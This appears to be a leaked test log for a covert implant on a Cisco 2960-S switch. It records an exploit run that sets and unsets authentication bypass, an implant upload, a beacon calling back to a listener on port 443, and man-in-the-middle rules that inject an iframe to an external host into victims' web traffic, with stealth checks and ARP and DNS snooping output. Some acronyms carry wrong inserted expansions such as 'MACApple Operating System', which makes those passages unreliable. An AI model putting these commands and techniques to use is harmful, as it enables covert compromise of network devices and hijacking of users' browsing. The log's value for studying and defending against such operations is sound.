      Image: c2960s-universalk9-mz.122-55.SE8
      Host: 192.168.10.136
      Action: Unset
      ****************************************

      Proceed? (y/n)y
      [*] Attempting connection to host 192.168.10.136:23
      [+] Connection established
      [*] Sending Protocol Step 1
      [*] Sending Protocol Step 2
      [+] Done

    6. Used remote to upload HG - no noticeable increase in CPU during HG upload

    7. Established CTCounter Terrorism session with HG -hairpiece.txt had inter set to fw0, added a bridge in flux for port 443, added a route in flux for 192.168.3.10 (IP HG will impersonate)

      [192.168.3.10]> beacon call_base_back https 192.168.3.40 443
      [Success]
      Trigger Sequence Number sent: 20
      ************ Success ************
      [beacon call_base_back https 192.168.3.40 443]

       

      > ilm listen hairpiece-1h.txt

      Listening for clients on port 443...
      Accepted connection from 192.168.3.10:12021
      Attempting SSLSecure Socket Layer Handshake...
      SSL Handshake Successful!
      [Success]
      New Key: lKrKpz01fbjBOvwswVnnQubw5ybZU74EjnnylEH0A*s=
      ************ Success ************
      [ilm listen hairpiece-1h.txt]

    8. Created SMITE rule

      [192.168.3.10]> mitm create http_iframe 192.168.10.0 255.255.255.0 0 0 0.0.0.0 0.0.0.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -ac 5 -sm 10 -en -bc -bk
      [Pending]
      Job: 136300856
      ************ Pending ************
      [mitm create http_iframe 192.168.10.0 255.255.255.0 0 0 0.0.0.0 0.0.0.0 80 80 http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ -ac 5 -sm 10 -en -bc -bk]

    9. Successfully windexed victim

    10. Deleted rule
    11. Uninstalled HG with device uninstall
    12. No log messages observed on DUT, no cpu spikes.
  18. On-device opsec test 
    1. reload DUTDevice Under Test to start with clean device
    2. collect show tech from switch and collect config in RANCID
    3. with ixia traffic, flux in place, set rocem, iac attack, unset rocem, uploaded hg, establish ct session.
    4. collect show tech
    5. uninstall hg
    6. collect show tech
  19. Replaced 2960-S with identical match to target - WS-C2960S-24PD-L.  Bootldr now also an exact match.
  20. Repeat ROCEM set/unset and interactive session smoke test on exact platform
    1. Verify IXIA traffic and flux up
    2. Successfully used ROCEM interactive session 10 times in a row
    3. Successfully set/unset ROCEM 10 times in a row, verifying between each that proper creds were required
    4. No logs or CPU spikes observed
  21. Complete run through of CONOPConcealed Operation on new switch
    1. IXIA traffic and Flux running
    2. Set ROCEM, IACInternational Access Code attack, Unset ROCEM
    3. Upload HG with remote
    4. Establish CTCounter Terrorism session
    5. Execute SMITE against victim - create rule, disable rule, delete rule
    6. Uninstall HG
  22. Test ROCEM without Flux
    1. Without flux, set ROCEM successfully
    2. Unset ROCEM and verified that creds are required
    3. Establish ROCEM interactive session
    4. Exit and verify that creds required
  23. Ad-hoc SMITE tests on new switch platform
    1. Verify flux and ixia traffic
    2. Reload DUTDevice Under Test to start with clean device
    3. Set ROCEM, IACInternational Access Code attack, unset ROCEM
    4. Use remote to upload hg
    5. Establish CTCounter Terrorism session: 

      beacon call_base_back https 192.168.3.40 443

    6. mitm create http_iframe 192.168.10.0 255.255.255.0 0 0 0.0.0.0 0.0.0.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -ac 5 -en -bc -bk

    7. Used this rule to limit SMITE to affect any single host just 5 times.
    8. Successfully executed SMITE and Windexed host - 5 times
    9. Attempted a 6th iframe on the same host and it was not injected
    10. Successfully used SMITE on Victim 2.
    11. Reloaded FilterBroker module - module stopped and started successfully, mitm show now reports no rules
    12. Readded mitm rule and was able to successfully Iframe both windows victims once again
    13. Attempted to disable rule and i got an error, the rule still has an active session and command will run once it's closed
    14. Attempted to delete rule and got the same error.  checked and one session still listed as active.  After a minute, i tried to view the rule again with mitm rule show 2, and it was no longer present
    15. mitm show lists no rules present
  24. Ad hoc - Test smite rules with same traffic matching rule but different iframe string to inject
    1. Created two identical rules, rule 3 with usual iframe and rule 4 with new iframe

      [192.168.3.10]> mitm show
      [Success]

      Actions Available:
      Action: HTTPHypertext Transfer Protocol IFRAMEEmbedded Webpage
      Version: 3

      Number of Rules: 2
      Rules:
      ID: 3 4
      Type: HTTPHypertext Transfer Protocol IFRAMEEmbedded Webpage HTTPHypertext Transfer Protocol IFRAMEEmbedded Webpage
      Enabled: Yes Yes
      Persistent: No No
      Persistent State: -- --
      Source IP: 192.168.10.0/24 192.168.10.0/24
      Dest IP: 0.0.0.0/0 0.0.0.0/0
      Action Data: http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJhttp://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=higher

      ************ Success ************
      [mitm show]

    2. Attempted to SMITE both Victims and both times each rx the iframe from rule 3, the lower numbered rule.  This is consistent with Aquaman 5 testing.

  25. ACE and Survey, Snooped host lists Smoke testing
    1. Performed a quick smoke test of ace module by running show commands through cmd exec "show ver" syntax
    2. Performed a quick smoke test of arp survey:

      [192.168.3.10]> socket get_arp_survey_data
      [Success]
      Vlan: 3
      Sender Protocol Address Sender Hardware Address Target Protocol Address Time Last Updated
      192.168.3.10 00:50:56:88:25:6d 192.168.3.254 2015-09-01T14:57:49Z

      Vlan: 10
      Sender Protocol Address Sender Hardware Address Target Protocol Address Time Last Updated
      192.168.10.11 00:50:56:88:40:eb 192.168.10.254 2015-09-01T14:56:53Z
      192.168.10.12 00:50:56:88:c8:33 192.168.10.254 2015-09-01T14:49:13Z
      192.168.10.11 00:50:56:88:40:eb 192.168.10.11 2015-09-01T14:25:00Z
      192.168.10.11 00:50:56:88:40:eb 192.168.10.12 2015-09-01T14:21:36Z
      192.168.10.12 00:50:56:88:c8:33 192.168.10.12 2015-09-01T14:21:35Z

      ************ Success ************
      [socket get_arp_survey_data]

    3. Verified snooped host lists:

    4. [192.168.3.10]> dns get_snooped_host_list_client 0 0
      [Pending]
      Job: 137073152
      ************ Pending ************
      [dns get_snooped_host_list_client 0 0]

      [192.168.3.10]> [Success]


      IP Address MACApple Operating System Addr VLANVirtual Local Area Network TTLTime To Live Count Resolver IP Status

      192.168.3.10 00:50:56:88:25:6D 3 128 10 4.4.4.4 GOOD
      Received 1 entries.

      Job: 137073152
      ************ Success ************

      [192.168.3.10]> web get_snooped_host_list_client 0 0
      [Success]
      There were no snooped entries
      ************ Success ************
      [web get_snooped_host_list_client 0 0]

      [192.168.3.10]> https get_snooped_host_list_client 0 0
      [Success]


      NonProxy Proxy Last Used
      IP Addr MACApple Operating System Addr VLANVirtual Local Area Network TTLTime To Live Count Count Proxy IP

      0. 192.168.3.10 00:50:56:88:25:6D 3 64 19 0 0.0.0.0
      Received 1 entries.

      ************ Success ************
      [https get_snooped_host_list_client 0 0]

      [192.168.3.10]>


Previous versions:

| 1 empty | 2 | 3 | 4 | 5 | 6 [Xetron] | 7 [Xetron] | 8 [Xetron] | 9 [Xetron] | 10 [Xetron] | 11 [Xetron] | 12 [Xetron] | 13 [Xetron] | 14 [Xetron] | 15 [Xetron] | 16 [Xetron] | 17 [Xetron] | 18 [Xetron] | 19 [Xetron] | 20 [Xetron] | 21 [Xetron] | 22 [Xetron] | 23 [Xetron] | 24 [Xetron] | 25 [Xetron] |

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh